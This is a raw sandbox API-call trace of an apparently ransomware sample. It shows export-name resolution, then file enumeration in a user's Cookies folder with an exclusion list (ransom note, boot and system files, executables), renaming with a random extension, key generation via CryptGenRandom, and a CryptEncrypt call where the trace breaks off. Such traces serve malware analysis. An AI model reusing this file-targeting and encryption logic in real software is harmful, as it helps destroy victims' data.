lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.083] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.083] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.083] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.083] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.083] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.083] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.083] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.083] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.083] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.083] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.083] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.083] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.083] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.083] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.083] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.084] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.084] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.084] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.084] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.084] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.084] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.084] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.084] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.084] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.084] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.084] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.084] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.084] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.084] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.084] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.084] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.084] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.084] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.084] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.084] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.085] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.085] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.085] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.085] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.085] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.085] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.085] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.085] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.085] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.085] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.085] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.085] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.085] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.085] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.085] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.085] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.085] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.085] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.086] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.086] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.086] lstrlenA (lpString="DELETEATOM") returned 10 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.086] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.086] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.086] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.086] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.086] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.086] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.086] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.086] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.086] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.086] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.086] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.086] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.086] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.086] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.086] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.087] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.087] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.087] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.087] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.087] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.087] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.087] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.087] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.087] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.087] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.087] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.087] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.087] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.087] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.087] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.087] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.087] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.087] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.087] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.088] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.088] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.088] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.088] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.088] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.088] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.088] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.088] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.088] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt") returned 113 [0079.089] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur") returned 119 [0079.089] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6ur"), dwFlags=0x0) returned 1 [0079.089] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.090] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.090] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.090] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2a0770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf7d5790, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7d5790, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adform[1].txt", cAlternateFileName="5P8600~1.TXT")) returned 1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="autorun.inf") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="boot.ini") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="desktop.ini") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="ntuser.dat") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="iconcache.db") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="bootsect.bak") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="thumbs.db") returned -1 [0079.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="Bootfont.bin") returned -1 [0079.090] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adform[1].txt") returned 34 [0079.090] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.090] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.090] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.091] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.091] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.091] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adform[1].txt") returned 34 [0079.091] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.091] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adform[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" [0079.091] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.092] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=234) returned 1 [0079.092] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.092] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.092] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.092] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.092] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.093] CryptEncrypt (in: 